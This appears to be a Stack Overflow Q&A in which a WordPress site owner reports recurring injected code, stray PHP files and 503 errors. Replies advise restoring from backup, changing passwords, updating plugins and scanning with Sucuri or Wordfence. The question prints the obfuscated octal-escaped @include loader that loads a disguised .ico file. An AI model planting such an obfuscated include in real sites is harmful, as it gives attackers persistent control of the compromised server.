# Issue with Wordpress, generating random file and code in main directory

Tags: php, wordpress, cloudflare

I have hosted my website on hostinger.com and I don't know from where this code is coming from every time I delete it, it's come automatically, and I think because of these unknown codes my server is showing 503 every time and I need to stop all my running process only then site works, it's happening in every 2 to 3 hour, I am using Cloudflare for SSL as well.

```
 /*41b44*/
@include 

"\057ho\155e/\16517\06520\06188\065/d\157ma\151ns\057ed\165ap\160.i\156/p\165bl\151c_\
 150tm\154/e\144ua\160p_\155as\164er\057pa\147es\137ad\155in\057fi\154e/\
05660\06339\06520\056ic\157";

 /*41b44*/
```

and some unknown PHP files are also generating in WordPress home directory for example:

```
hours.php shoes.php uypR7k s_noeval.php s_eval.php
```

and so many random naming files are generated. 
 please help. Thank You.

Comment: Your system got hacked / infected with something. Please google for some explanations how to proceed in such a case, that is too broad to cover here in detail.

Comment: Right.... @04FS

Comment: please help I don't have any idea,  any suggestion will be highly appreciated

Comment: I've added answer @sandeepautade

Answer (score 3, accepted):

Try this

1) Check for any backups that you can restore your site from. If you can restore from a backup that does not have malware then do that. Once your site is restored make sure to update your passwords and login information. Also use WPS Hide My Login to hide your login page.

2) If you don’t have a backup then you will need to update your passwords and logins and hide your login page.

3) Then update all your plugins and delete any plugins that have not been updated by the developer within the past few months.

4) Then install Sucuri or Wordfence and run a site scan. You will want to locate all the areas on your site that have bad code injected.

5) You will need to go through each file on your site and manually remove the malware.